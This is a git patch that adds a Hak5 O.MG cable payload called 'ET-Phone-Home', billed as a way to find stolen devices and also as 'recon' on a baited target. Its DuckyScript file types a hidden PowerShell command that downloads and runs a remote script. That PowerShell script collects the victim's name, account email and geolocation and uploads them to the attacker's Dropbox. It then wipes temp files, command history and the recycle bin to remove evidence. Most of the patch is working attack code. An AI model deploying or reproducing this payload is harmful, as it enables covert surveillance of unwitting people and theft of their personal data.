From a20015c4a4a5237fdca326000d3f0bb6f62c453c Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Thu, 28 Apr 2022 05:28:03 -0500 Subject: [PATCH] NEW-PayLoad ET-Phone-Home --- .../ET-Phone-Home-Execute.txt | 14 ++ .../OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1 | 151 ++++++++++++++++++ .../OMG-ET-Phone-Home/README.md | 128 +++++++++++++++ 3 files changed, 293 insertions(+) create mode 100644 payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt create mode 100644 payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1 create mode 100644 payloads/library/incident_response/OMG-ET-Phone-Home/README.md diff --git a/payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt b/payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt new file mode 100644 index 0000000..0b3c1d0 --- /dev/null +++ b/payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt @@ -0,0 +1,14 @@ +REM this script will download and execute your locator script if your wifi access point is not detected +REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in + +REM Replace SSID with name of wifi your computer is connected to + +IF_NOT_PRESENT SSID="Home" + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly diff --git a/payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1 b/payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1 new file mode 100644 index 0000000..d6edf01 --- /dev/null +++ b/payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1 @@ -0,0 +1,151 @@ + +############################################################################################################################################################ +# | ___ _ _ _ # ,d88b.d88b # +# Title : OMG-ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # +# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # +# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # +# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # +# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # +# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # +# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # +# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # +# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # +#__________________________________|_________________________________________________________________________# | | ) ~ ( # +# # / \ / ~ \ # +# github.com/I-Am-Jakoby # \ / \~ ~/ # +# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# +# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# +# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# +############################################################################################################################################################ + +<# +.SYNOPSIS + This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target + +.DESCRIPTION + This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait. + This script will get the Name and email associated with the targets microsoft account + Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated +#> + +#------------------------------------------------------------------------------------------------------------------------------------ + +$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt" + + #------------------------------------------------------------------------------------------------------------------------------------ + + function Get-fullName { + + try { + + $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name") + + } + + # If no name is detected function will return $env:UserName + + # Write Error is just for troubleshooting + catch {Write-Error "No name was detected" + return $env:UserName + -ErrorAction SilentlyContinue + } + + return $fullName + +} + +$FN = Get-fullName + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Get-email { + + try { + + $email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim() + return $email + } + +# If no email is detected function will return backup message for sapi speak + + # Write Error is just for troubleshooting + catch {Write-Error "An email was not found" + return "No Email Detected" + -ErrorAction SilentlyContinue + } +} + +$EM = Get-email + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Get-GeoLocation{ + try { + Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace + $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object + $GeoWatcher.Start() #Begin resolving current locaton + + while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { + Start-Sleep -Milliseconds 100 #Wait for discovery. + } + + if ($GeoWatcher.Permission -eq 'Denied'){ + Write-Error 'Access Denied for Location Information' + } else { + $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. + } + } + # Write Error is just for troubleshooting + catch {Write-Error "No coordinates found" + return "No Coordinates found" + -ErrorAction SilentlyContinue + } + +} + +$GL = Get-GeoLocation + +#------------------------------------------------------------------------------------------------------------------------------------ + +echo $FN >> $env:TMP\$FileName +echo $EM >> $env:TMP\$FileName +echo $GL >> $env:TMP\$FileName + +#------------------------------------------------------------------------------------------------------------------------------------ + +# Upload output file to dropbox + +$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" +$TargetFilePath="/$FileName" +$SourceFilePath="$env:TMP\$FileName" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $DropBoxAccessToken +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers + +#------------------------------------------------------------------------------------------------------------------------------------ + +<# + +.NOTES + This is to clean up behind you and remove any evidence to prove you were there +#> + +# Delete contents of Temp folder + +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# Delete run box history + +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history + +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Deletes contents of recycle bin + +Clear-RecycleBin -Force -ErrorAction SilentlyContinue diff --git a/payloads/library/incident_response/OMG-ET-Phone-Home/README.md b/payloads/library/incident_response/OMG-ET-Phone-Home/README.md new file mode 100644 index 0000000..b09ae68 --- /dev/null +++ b/payloads/library/incident_response/OMG-ET-Phone-Home/README.md @@ -0,0 +1,128 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-AcidBurn/logo-170-px.png?raw=true) + + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# OMG ET Phone Home + +A script I put together to locate your stolen devices, or your "stolen" baited devices + +## Description + +This program is meant to locate your devices. Save the execution file on the boot partition of your devices and when someone plugs it into their computer +Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the +latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox. +Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin. + +## Getting Started + +### Dependencies + +* DropBox - Your Shared link for the intended file +* Windows 7,10,11 + +

(back to top)

+ +### Executing program + +* Your device is plugged into the targets computer +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory if your intended wifi network is not detected with the + geofencing options +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl +``` +* The OMG device will attempt to detect the Wifi Access point you designated, if it does not.. +* A one liner in the run box will download and execute the ET-Phone-Home Script +* This script will get the Name and Email associated with the microsoft account of the persons computer your device connected to +* The latitude and longitude of where the device was when it was activated will also be collected +* This gathered information will be saved to a text file in the TMP Directory +* That file will be uploaded to your DropBox cloud storage + +Something Like What you see below will be in your cloud storage: + +NAME + +EMAIL + +LATITUDE AND LONGITUDE + +``` +Jakoby + +jakoby@example.com + + Latitude Longitude + -------- --------- +37.778919 -122.416313 +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +Kalani + + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

I am Jakoby

+


+ + + + + + + + + + + + + + + + + + + + Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG-ET-Phone-Home) +

+ + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + + + +

(back to top)